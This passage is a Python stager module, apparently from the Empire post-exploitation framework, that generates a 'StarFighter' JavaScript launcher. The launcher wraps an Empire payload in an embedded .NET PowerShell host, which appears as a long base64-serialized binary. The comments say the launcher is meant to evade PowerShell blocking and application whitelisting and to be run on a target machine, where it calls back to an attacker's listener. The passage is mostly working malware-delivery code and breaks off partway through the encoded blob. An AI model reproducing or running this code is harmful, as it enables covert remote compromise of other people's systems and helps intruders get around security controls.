from lib.common import helpers
from termcolor import colored

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'Js Launcher StarFighter',

            'Author': ['@Cn33liz'],

            'Description': ('Generates a .js launcher for Empire.'),

            'Comments': [
                'https://github.com/Cn33liz/StarFighters'
            ]
        }

        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Listener': {
                'Description':   'Listener to generate stager for.',
                'Required':   True,
                'Value':   ''
            },
            'Language' : {
                'Description'   :   'Language of the stager to generate.',
                'Required'      :   True,
                'Value'         :   'powershell'
            },
            'StagerRetries': {
                'Description':   'Times for the stager to retry connecting.',
                'Required':   False,
                'Value':   '0'
            },
            'Base64' : {
                'Description'   :   'Switch. Base64 encode the output.',
                'Required'      :   True,
                'Value'         :   'True'
            },
            'Obfuscate' : {
                'Description'   :   'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
                'Required'      :   False,
                'Value'         :   'False'
            },
            'ObfuscateCommand' : {
                'Description'   :   'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
                'Required'      :   False,
                'Value'         :   r'Token\All\1,Launcher\STDIN++\12467'
            },
            'OutFile': {
                'Description':   'File to output JS to, otherwise displayed on the screen.',
                'Required':   False,
                'Value':   '/tmp/launcher.js'
            },
            'UserAgent': {
                'Description':   'User-agent string to use for the staging request (default, none, or other).',
                'Required':   False,
                'Value':   'default'
            },
            'Proxy': {
                'Description':   'Proxy to use for request (default, none, or other).',
                'Required':   False,
                'Value':   'default'
            },
            'ProxyCreds': {
                'Description':   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required':   False,
                'Value':   'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        base64 = self.options['Base64']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        encode = False
        if base64.lower() == "true":
            encode = True
            
        obfuscateScript = False
        if obfuscate.lower() == "true":
            obfuscateScript = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName, language=language, encode=encode, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
	launcher = launcher.replace("powershell -noP -sta -w 1 -enc  ","")
        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            code ="/*""\n"
            code +="  _________ __              ___________.__       .__     __                       ""\n"
            code +=" /   _____//  |______ ______\_   _____/|__| ____ |  |___/  |_  ___________  ______""\n"
            code +=" \_____  \\   __\__  \\_  __ \    __)  |  |/ ___\|  |  \   __\/ __ \_  __ \/  ___/""\n"
            code +=" /        \|  |  / __ \|  | \/     \   |  / /_/  >   Y  \  | \  ___/|  | \/\___ \ ""\n"
            code +="/_______  /|__| (____  /__|  \___  /   |__\___  /|___|  /__|  \___  >__|  /____  >""\n"
            code +="        \/           \/          \/      /_____/      \/          \/           \/ ""\n"
            code +="                                                                 By Cn33liz 2017""\n"
            code +="\n"
            code +="A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.""\n"
            code +="These Launchers are usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.""\n"
            code +="\n"
            code +="Empire PowerShell Host build by Cn33liz and embedded within JavaScript using DotNetToJScript from James Forshaw""\n"
            code +="https://github.com/tyranid/DotNetToJScript""\n"
            code +="\n"
            code +="Usage:""\n"
            code +="Setup a new Listener within PowerShell Empire and use the Launcher command to Generate a PowerShell launcher for the listener.""\n"
            code +="Copy the Base64 encoded Launcher Payload and Replace the below EncodedPayload string value.""\n"
            code +="*/""\n"
            code +="\n"
            code +="var EncodedPayload = \"" + launcher + "\"\n"
            code +="\n"
            code +="/*""\n"
            code +="Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.""\n"
            code +="*/""\n"
            code +="\n"
            code +="function setversion() {""\n"
            code +="}""\n"
            code +="function debug(s) {}""\n"
            code +="function base64ToStream(b) {""\n"
            code +="	var enc = new ActiveXObject(\"System.Text.ASCIIEncoding\");""\n"
            code +="	var length = enc.GetByteCount_2(b);""\n"
            code +="	var ba = enc.GetBytes_4(b);""\n"
            code +="	var transform = new ActiveXObject(\"System.Security.Cryptography.FromBase64Transform\");""\n"
            code +="	ba = transform.TransformFinalBlock(ba, 0, length);""\n"
            code +="	var ms = new ActiveXObject(\"System.IO.MemoryStream\");""\n"
            code +="	ms.Write(ba, 0, (length / 4) * 3);""\n"
            code +="	ms.Position = 0;""\n"
            code +="	return ms;""\n"
            code +="}"
            code +="\n"
            code +="var serialized_obj = \"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy\"+""\n"
            code +="\"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph\"+""\n"
            code +="\"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk\"+""\n"
            code +="\"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD\"+""\n"
            code +="\"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl\"+""\n"
            code +="\"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU\"+""\n"
            code +="\"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl\"+""\n"
            code +="\"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90\"+""\n"
            code +="\"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu\"+""\n"
            code +="\"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH\"+""\n"
            code +="\"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA\"+""\n"
            code +="\"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw\"+""\n"
            code +="\"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu\"+""\n"
            code +="\"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA\"+""\n"
            code +="\"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u\"+""\n"
            code +="\"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5\"+""\n"
            code +="\"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR\"+""\n"
            code +="\"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA\"+""\n"
            code +="\"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y\"+""\n"
            code +="\"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh\"+""\n"
            code +="\"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz\"+""\n"
            code +="\"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAHoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy\"+""\n"
            code +="\"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAIvEzWQAAAAAA\"+""\n"
            code +="\"AAAA4AAiIAsBMAAAcgAAAAYAAAAAAADGkQAAACAAAACgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA\"+""\n"
            code +="\"AAAAAAAAAOAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAdJEA\"+""\n"
            code +="\"AE8AAAAAoAAAiAMAAAAAAAAAAAAAAAAAAAAAAAAAwAAADAAAADyQAAAcAAAAAAAAAAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA\"+""\n"
            code +="\"AAAALnRleHQAAADMcQAAACAAAAByAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAiAMAAACg\"+""\n"
            code +="\"AAAABAAAAHQAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAwAAAAAIAAAB4AAAAAAAAAAAA\"+""\n"
            code +="\"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAKiRAAAAAAAASAAAAAIABQBIPQAA9FIAAAEAAAAAAAAA\"+""\n"
            code +="\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzACAB4AAAAB\"+""\n"
            code +="\"AAARKBEAAAoDKBIAAApvEwAACgp+AQAABAZvCwAABhcqHgIoFAAACioucwQAAAaAAQAABCoAABsw\"+""\n"
            code +="\"AwDmAAAAAgAAEQJzFAAACn0HAAAEAigUAAAKKBUAAAoKBnIBAABwcxYAAApvFwAACgICcw0AAAZ9\"+""\n"
            code +="\"BAAABAICewQAAAQGKBgAAAp9BQAABAJ7BQAABG8ZAAAKAnsHAAAECwcoGgAACgIoGwAACn0GAAAE\"+""\n"
            code +="\"3gcHKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKcg0AAHAoOAAABgwWDSsiCAmaEwQCewYAAAQRBG8e\"+""\n"
            code +="\"AAAKAnsGAAAEbx8AAAomCRdYDQkIjmky2N4pAnsHAAAECwcoGgAACgJ7BgAABG8gAAAKAhR9BgAA\"+""\n"
            code +="\"BN4HBygcAAAK3NwqAAABKAAAAgBdAA1qAAcAAAAAAgDJABTdAAcAAAAAAgByAEq8ACkAAAAAHgJ7\"+""\n"
            code +="\"AgAABCoiAgN9AgAABCoeAnsDAAAEKiICA30DAAAEKgAAGzAFAMoAAAADAAARAyghAAAKLAEqAnsH\"+""\n"
            code +="\"AAAECgYoGgAACgIoGwAACn0GAAAE3gcGKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEA28i\"+""\n"
            code +="\"AAAKJgJ7BgAABHIjAABwbyMAAAomAnsGAAAEbyQAAApvJQAAChZvJgAAChgXbycAAAoELBgCewYA\"+""\n"
            code +="\"AAQXjRAAAAElFgSibygAAAom3jcCewYAAARvHwAACibeKQJ7BwAABAoGKBoAAAoCewYAAARvIAAA\"+""\n"
            code +="\"CgIUfQYAAATeBwYoHAAACtzcKgAAASgAAAIAFgANIwAHAAAAAAIArQAUwQAHAAAAAAIAKwB1oAAp\"+""\n"
            code +="\"AAAAABswBQAKAQAABAAAEQM5AwEAAAN1FgAAAQsHLAkHbykAAAoKKw4DcjsAAHAWFHMqAAAKCgJ7\"+""\n"
            code +="\"BwAABAwIKBoAAAoCKBsAAAp9BgAABN4HCCgcAAAK3AJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEcmUA\"+""\n"
            code +="\"AHBvIgAACnJzAABwbyMAAAomcysAAAoTBBEEBm8sAAAKEQRvLQAACgJ7BgAABBEEbygAAAoNCW8u\"+""\n"
            code +="\"AAAKFjE9CRZvLwAACm8wAAAKdUMAAAETBREFKCEAAAotIQJ7BAAABG8xAAAKEQUWEQVvMgAAChhZ\"+""\n"
            code +="\"bzMAAApvNAAACt4pAnsHAAAEDAgoGgAACgJ7BgAABG8gAAAKAhR9BgAABN4HCCgcAAAK3NwqAAAB\"+""\n"
            code +="\"KAAAAgA0AA1BAAcAAAAAAgDtABQBAQcAAAAAAgBZAIfgACkAAAAAGzADABUAAAAFAAARAgMUKAkA\"+""\n"
            code +="\"AAbeCgoCBigKAAAG3gAqAAAAARAAAAAAAAAKCgAKGgAAARswAgBfAAAABgAAEQJ7BwAABAoGKBoA\"+""\n"
            code +="\"AAoCewYAAAQsHgJ7BgAABG81AAAKbzYAAAoXMwsCewYAAARvNwAACt4HBigcAAAK3AQXbzgAAAre\"+""\n"
            code +="\"GQsCewQAAARvMQAACgdvOQAACm80AAAK3gAqAAEcAAACAA0AKDUABwAAAAAAAAAARUUAGRUAAAHm\"+""\n"
            code +="\"Aig6AAAKbzsAAAp9CwAABAIoOgAACm88AAAKfQwAAAQCczYAAAZ9DQAABAIoPQAACgIDfQoAAAQq\"+""\n"
            code +="\"HgJ7CwAABCoeAnsMAAAEKhp+CQAABCoacokAAHAqHgJ7DQAABCoqFxYWFnM+AAAKKioCewgAAAQU\"+""\n"
            code +="\"/gMqMgJ7CgAABHsFAAAEKjYCewoAAAQDfQUAAAQqLnKXAABwcz8AAAp6LnI+AQBwcz8AAAp6Bipm\"+""\n"
            code +="\"AnsKAAAEF28GAAAGAnsKAAAEA28IAAAGKlICAnsIAAAEKBYAAAYCFH0IAAAEKlICAigVAAAGfQgA\"+""\n"
            code +="\"AAQCAygWAAAGKi4oQAAACoAJAAAEKh4Cew4AAAQqABswBwCBAAAABwAAEQIfCRYDcrYBAHAEcroB\"+""\n"
            code +="\"AHAoQQAACm9CAAAKc0MAAAoKBW9EAAAKCys/B29FAAAKDAhvRgAACig0AAAGDQIJF5pvRwAACihI\"+""\n"
            code +="\"AAAKEwQRBC0FFBMF3ikGCG9JAAAKEQQoSgAACm9LAAAKB29MAAAKLbneCgcsBgdvTQAACtwGKhEF\"+""\n"
            code +="\"KgAAAAEQAAACACcAS3IACgAAAAATMAkA/QAAAAgAABECHwkWA3K2AQBwBHK2AQBwKEEAAApvTgAA\"+""\n"
            code +="\"CgUoNQAABgpzTwAACgsWDCs2ByhQAAAKcr4BAHAYjRAAAAElFgYWCChRAAAKoiUXBhcIKFEAAAqi\"+""\n"
            code +="\"KFIAAApvUwAACiYIF1gMCAVvVAAACjLBByhQAAAKctQBAHAXjRAAAAElFgYWDgQoUQAACqIoUgAA\"+""\n"
            code +="\"Cm9TAAAKJgIfCxYHbzkAAApvTgAACihIAAAKb1UAAAooUAAACm9WAAAKDQlvMgAACi0DDgQqFhME\"+""\n"
            code +="\"KxoGFhEEKFEAAAoJKFcAAAosAxEEKhEEF1gTBBEEBW9UAAAKMtwCcvgBAHAJKFgAAApvNAAACiuV\"+""\n"
            code +="\"AAAAGzAJAPoBAAAJAAARAh8JFgNytgEAcARytgEAcChBAAAKb04AAAoFKDUAAAYKc08AAAoLFhME\"+""\n"
            code +="\"KzoHKFAAAApyvgEAcBiNEAAAASUWBhYRBChRAAAKoiUXBhcRBChRAAAKoihSAAAKb1MAAAomEQQX\"+""\n"
            code +="\"WBMEEQQFb1QAAAoyvHNZAAAKDA4EOcUAAAAWEwUOBG9aAAAKEwYrFxEGb1sAAAoTBxEFF1gTBQgR\"+""\n"
            code +="\"B29cAAAKEQZvTAAACi3g3gwRBiwHEQZvTQAACtwRBTmCAAAABxEFFy4HchoCAHArBXJGAgBwb1MA\"+""\n"
            code +="\"AAomDgRvWgAAChMGKywRBm9bAAAKEwgHKFAAAApybgIAcBeNEAAAASUWBhYRCChRAAAKom9dAAAK\"+""\n"
            code +="\"JhEGb0wAAAoty94MEQYsBxEGb00AAArcBwdvXgAAChdZF29fAAAKJgdyfAIAcG9TAAAKJgIfCxYH\"+""\n"
            code +="\"bzkAAApvTgAACnNZAAAKDShQAAAKcoACAHAXjRAAAAElFglvYAAACoxSAAABoihSAAAKEwkCHwsW\"+""\n"
            code +="\"EQlvQgAACihIAAAKb1UAAAooUAAACm9WAAAKEwoRCm8yAAAKLQwJb2AAAAosAgkqCCoWEwsrIgYW\"+""\n"
            code +="\"EQsoUQAAChEKKFcAAAosCgkRC29cAAAKK4QRCxdYEwsRCwVvVAAACjLUAnL4AQBwEQooWAAACm80\"+""\n"
            code +="\"AAAKOF3///8AAAEcAAACAIkAJK0ADAAAAAACAOEAORoBDAAAAAATMAUAKAAAAAoAABEOBAMEBRQo\"+""\n"
            code +="\"bgAABgoGLBcGb3kAAAYGb30AAAYoiwAABnNhAAAKKhQqEzAFACgAAAAKAAARDgQDBAUUKG4AAAYK\"+""\n"
            code +="\"BiwXBm95AAAGBm99AAAGKIsAAAZzYQAACioUKhooSAAACiouKEgAAAooiwAABioeAyhiAAAKKgAT\"+""\n"
            code +="\"MAIAKQAAAAsAABEoYwAACgooZAAACgMoZQAACgQoZgAACgUoYgAACgYoZQAACihmAAAKKgAAABMw\"+""\n"
            code +="\"AgApAAAACwAAEShjAAAKCihkAAAKAyhlAAAKBChmAAAKBShnAAAKBihlAAAKKGYAAAoqAAAAEzAJ\"+""\n"
            code +="\"ACIAAAAAAAAAAhwWKFAAAApymgIAcBeNEAAAASUWA6IoUgAACm9OAAAKKi4CHwwWA29OAAAKKhoo\"+""\n"
            code +="\"aAAACioeAyhnAAAKKgAAABMwCQAjAAAAAAAAAAIfDhYoUAAACnKwAgBwF40QAAABJRYDoihSAAAK\"+""\n"
            code +="\"b04AAAoqABMwCQAjAAAAAAAAAAIfDhYoUAAACnLKAgBwF40QAAABJRYDoihSAAAKb04AAAoqABMw\"+""\n"
            code +="\"BQBzAAAADAAAERiNQwAAASUWfmkAAAqiJRd+aQAACqIKAheNUwAAASUWHyadb2oAAAoLB45pGDM+\"+""\n"
            code +="\"BxeabzIAAAoWMR4GFgcXmhZvawAACgwSAihsAAAKKFAAAApvVgAACqIGFwcWmgcXmihYAAAKb1UA\"+""\n"
            code +="\"AAqiKwQGFwKiBioAEzAFAEgAAAANAAARGAJvVAAACnNtAAAKChYLKywCB29uAAAKb28AAAooNAAA\"+""\n"
            code +="\"BgwGFgcIFpoocAAACgYXBwgXmihwAAAKBxdYCwcCb1QAAAoyywYqSgJzWAAABn0OAAAEAihxAAAK\"+""\n"
            code +="\"KgATMAQAXwAAAAAAAAAFc3IAAAolb3MAAApy5AIAcAJzdAAACm91AAAKJW9zAAAKcgYDAHADc3QA\"+""\n"
            code +="\"AApvdQAACiVvcwAACnIuAwBwBHN0AAAKb3UAAAolb3MAAApyVgMAcAVzdAAACm91AAAKKiICFig5\"+""\n"
            code +="\"AAAGKhMwBADkAAAADgAAEXN2AAAKChQWAyg7AAAGCwIWAyg7AAAGDBQXAyg7AAAGDQIXAyg7AAAG\"+""\n"
            code +="\"EwQHCAkRBCg3AAAGEwVzdwAAChMGEQZyhAMAcG94AAAKJhEGcp4DAHByqAMAcG95AAAKJhEGcrgD\"+""\n"
            code +="\"AHARBW95AAAKJhEGcsQDAHAWjFcAAAFveQAACiYGEQZvegAAChqNQwAAASUWB6IlFwiiJRgJoiUZ\"+""\n"
            code +="\"EQSiEwcWEwgrMBEHEQiaEwkRCSh7AAAKLBpzdwAAChMGEQYRCRZvfAAACiYGEQZvegAAChEIF1gT\"+""\n"
            code +="\"CBEIEQeOaTLIBm99AAAKKiYCAxYoOwAABioAABMwAwBeAAAADwAAERQKAywVGyh+AAAKCgZy0gMA\"+""\n"
            code +="\"cCh/AAAKCisVAig9AAAGCgYoIQAACiwGfmkAAAoqBC0HcvYDAHArBXIOBABwCwIoIQAACi0NAnIw\"+""\n"
            code +="\"BABwByiAAAAKCwYHKH8AAAolCioAABswAgBwAAAAEAAAEXI0BABwCn6BAAAKBm+CAAAKDAgsEwhy\"+""\n"
            code +="\"lgQAcG+DAAAKdUMAAAEN3kbeCggsBghvTQAACtwohAAACgsHLAwHb4UAAAoohgAACirQGAAAASiH\"+""\n"
            code +="\"AAAKKIgAAAoLBywMB2+FAAAKKIYAAAoqfmkAAAoqCSoBEAAAAgASABgqAAoAAAAAGzABABQAAAAB\"+""\n"
            code +="\"AAARfmkAAAoKAig8AAAGCt4DJt4ABioBEAAAAAAGAAkPAAM0AAABGihkAAAKKh4DKGYAAAoqQiiJ\"+""\n"
            code +="\"AAAKKIoAAApziwAACipSDwEojAAACg8BKI0AAAoojgAACioucrYEAHBzPwAACnoaKI8AAAoqHgMo\"+""\n"
            code +="\"kAAACioaKGMAAAoqHgMoZQAACioaKJEAAAoqQiiSAAAKKJMAAApziwAACipCKJQAAAoolQAACnOW\"+""\n"
            code +="\"AAAKKlIPASiXAAAKDwEomAAACiiZAAAKKkIomgAACiibAAAKc4sAAAoqUg8BKIwAAAoPASiNAAAK\"+""\n"
            code +="\"KJwAAAoqGiidAAAKKh4DKJ4AAAoqLnJDBQBwcz8AAAp6LnLSBQBwcz8AAAp6LnJQBgBwcz8AAAp6\"+""\n"
            code +="\"LnLpBgBwcz8AAAp6HgIonwAACioqAgMUFChbAAAGKi4CAwQUFChcAAAGKj4CA36gAAAKBAUoXAAA\"+""\n"
            code +="\"Biq+KKEAAApvogAACm+jAAAKHDIMAgMEBQ4EKGQAAAYqKKQAAAoCAwQFDgQobwAABio2AgN+oAAA\"+""\n"
            code +="\"CiheAAAGKj4CA36gAAAKFBQoYAAABio+AgN+oAAACgQFKGAAAAYqviihAAAKb6IAAApvowAAChwy\"+""\n"
            code +="\"DAIDBAUOBChpAAAGKiikAAAKAgMEBQ4EKHUAAAYqSgIDfmkAAAp+aQAACihjAAAGKiYCAwQoYgAA\"+""\n"
            code +="\"Bio+AgN+oAAACgQFKGQAAAYqegIDc5oAAAYlBG+RAAAGJRZvlQAABgUOBChlAAAGKgAbMAMArAAA\"+""\n"
            code +="\"ABEAABEDKCEAAAosEQQoIQAACiwJAhQUKAEAACsqc6UAAAoKc6UAAAoLAyghAAAKLSQDDBYNKxUI\"+""\n"
            code +="\"CW9rAAAKEwQGEQRvpgAACgkXWA0JCG8yAAAKMuIEKCEAAAotJAQMFg0rFQgJb2sAAAoTBQcRBW+m\"+""\n"
            code +="\"AAAKCRdYDQkIbzIAAAoy4gZvpwAACgdvpwAACgIGBygBAAArEwbeFAcsBgdvTQAACtwGLAYGb00A\"+""\n"
            code +="\"AArcEQYqARwAAAIAJQBwlQAKAAAAAAIAHwCAnwAKAAAAAD4CA36gAAAKFBQoaQAABiouAgMEFBQo\"+""\n"
            code +="\"aQAABio+AgN+oAAACgQFKGkAAAYqegIDc5oAAAYlBG+RAAAGJRZvlQAABgUOBChqAAAGKiYCAwQo\"+""\n"
            code +="\"AgAAKyoAAAAbMAkA7AEAABIAABFzuAAABiUCb4wAAAZ9WAAABCUCb44AAAZ9VwAABCUCb5AAAAZ9\"+""\n"
            code +="\"VgAABCUCb5IAAAZ9WQAABAoCb5YAAAYLfqAAAAoMfqAAAAoNFhMEfqAAAAoTBRYTBn6gAAAKEwcW\"+""\n"
            code +="\"EwgCb5QAAAYTCQMtAwQsIgMtB3OlAAAKEAEELQdzpQAAChACAyioAAAKDAQoqAAACg0IfqAAAAoo\"+""\n"
            code +="\"qQAACi0NCX6gAAAKKKkAAAosVyAABAAAEwgRCCiqAAAKEwcWCAkRBxIIKK8AAAYtOSirAAAKEwsR\"+""\n"
            code +="\"Cx96MyQRBxEIKKwAAAoTBxYICREHEggorwAABi0TKKsAAApzrQAACnoRC3OtAAAKegYCb5gAAAYS\"+""\n"
            code +="\"BBEHEQgSBRIGEgkHKK0AAAYTChEKLCIRCiDHBAAAMxESDP4VDgAAGxEMEwzdrwAAABEKc60AAAp6\"+""\n"
            code +="\"0A4AABsohwAACtALAAACKIcAAAozIBcRBREGKLMAAAYlEQlviQAABnUOAAAbpQ4AABsTDN5xFxEF\"+""\n"
            code +="\"EQYosgAABiURCW+AAAAGdQ4AABulDgAAGxMM3lERB36gAAAKKKkAAAosBxEHKK4AAAoRBX6gAAAK\"+""\n"
            code +="\"KKkAAAosBxEFKK4AAAoIfqAAAAooqQAACiwGCCiuAAAKCX6gAAAKKKkAAAosBgkorgAACtwRDCpB\"+""\n"
            code +="\"HAAAAgAAAGgAAAAwAQAAmAEAAFEAAAAAAAAAOgIDBHOrAAAGKHAAAAYqKgIDBAUobQAABipGAgME\"+""\n"
            code +="\"fqAAAAoFDgQobwAABipmAgMEc6sAAAYlBW+iAAAGDgQOBShxAAAGKiYCFBQocQAABiobMAMAkwAA\"+""\n"
            code +="\"ABEAABFzpQAACgpzpQAACgsDKCEAAAotJAMMFg0rFQgJb2sAAAoTBAYRBG+mAAAKCRdYDQkIbzIA\"+""\n"
            code +="\"AAoy4gQoIQAACi0kBAwWDSsVCAlvawAAChMFBxEFb6YAAAoJF1gNCQhvMgAACjLiBm+nAAAKB2+n\"+""\n"
            code +="\"AAAKAgYHKAMAACsTBt4UBywGB29NAAAK3AYsBgZvTQAACtwRBioAARwAAAIADABwfAAKAAAAAAIA\"+""\n"
            code +="\"BgCAhgAKAAAAADoCAwRzqwAABih2AAAGKjICAwQFFBQodQAABipGAgMEfqAAAAoFDgQodQAABipm\"+""\n"
            code +="\"AgMEc6sAAAYlBW+iAAAGDgQOBSh3AAAGKiYCFBQoBAAAKyomAgMEKAQAACsqGzAKACMCAAATAAAR\"+""\n"
            code +="\"Ai0LcnwHAHBzrwAACnoDLB0Db7AAAAogAQIAADEQcowHAHByngcAcHOxAAAKegQsHQRvsAAACiAA\"+""\n"
            code +="\"AQAAMRBy1AcAcHLmBwBwc7EAAAp6c7gAAAYlAm+bAAAGfVgAAAQlAm+dAAAGfVcAAAQlAm+hAAAG\"+""\n"
            code +="\"fVYAAAQlAm+jAAAGfVkAAAQKfqAAAAoLfqAAAAoMAm+lAAAGDQMtFSAEBAAAKKoAAAoLBxYWKLIA\"+""\n"
            code +="\"AAorEwMoqAAACgsHIAQEAAAorAAACgsELRUgAgIAACiqAAAKDAgWFiiyAAAKKxMEKKgAAAoMCCAC\"+""\n"
            code +="\"AgAAKKwAAAoMByACBAAAFiiyAAAKCCAAAgAAFiiyAAAKBgJvnwAABn6gAAAKAm+pAAAGByABAgAA\"+""\n"
            code +="\"CCAAAQAAEgMCb6cAAAYorAAABhMEEQQfVzAMEQQsQxEEH1cuJSszEQQg7AMAAC4iEQQgxwQAADMh\"+""\n"
            code +="\"EgX+FQ4AABsRBRMF3bkAAAARBHOtAAAKehEEc60AAAp6EQRzrQAACnrQDgAAGyiHAAAK0AsAAAIo\"+""\n"
            code +="\"hwAACjMyc4oAAAYlByi0AAAGb4MAAAYlCCi0AAAGb4cAAAYlCW+JAAAGdQ4AABulDgAAGxMF3llz\"+""\n"
            code +="\"gQAABiUHKLMAAApvegAABiUIKLMAAApvfgAABiUJb4AAAAZ1DgAAG6UOAAAbEwXeJwd+oAAACiip\"+""\n"
            code +="\"AAAKLAYHKK4AAAoIfqAAAAooqQAACiwGCCiuAAAK3BEFKgBBHAAAAgAAAJcAAABiAQAA+QEAACcA\"+""\n"
            code +="\"AAAAAAAAHgJ7EwAABCoiAgN9EwAABCoeAnsUAAAEKiICA30UAAAEKh4CexUAAAQqIgIDfRUAAAQq\"+""\n"
            code +="\"HgJ7FgAABCoiAgN9FgAABCoeAnsXAAAEKiICA30XAAAEKh4CexgAAAQqIgIDfRgAAAQqHgJ7GQAA\"+""\n"
            code +="\"BCoiAgN9GQAABCoeAnsaAAAEKiICA30aAAAEKhMwAwA0AAAAFAAAEXO2AAAGCgZzpQAACn1PAAAE\"+""\n"
            code +="\"Am+0AAAKKAUAACsG/ga3AAAGc7YAAApvtwAACgZ7TwAABCoeAns7AAAEKoIDbzIAAAoggAAAADEL\"+""\n"
            code +="\"chwIAHBzuAAACnoCA307AAAEKh4CezwAAAQqggNvMgAACiD/fwAAMQtyHAgAcHO4AAAKegIDfTwA\"+""\n"
            code +="\"AAQqHgJ7PQAABCoiAgN9PQAABCoeAns+AAAEKiICA30+AAAEKh4Cez8AAAQqIgIDfT8AAAQqHgJ7\"+""\n"
            code +="\"QAAABCoiAgN9QAAABCoeAntBAAAEKiICA31BAAAEKgATMAIAQgAAAAAAAAACKBQAAAoDKCEAAAos\"+""\n"
            code +="\"C3IoCABwc68AAAp6BCghAAAKLAtyOAgAcHOvAAAKegIDKI0AAAYCBCiPAAAGAhcolwAABioeAntC\"+""\n"
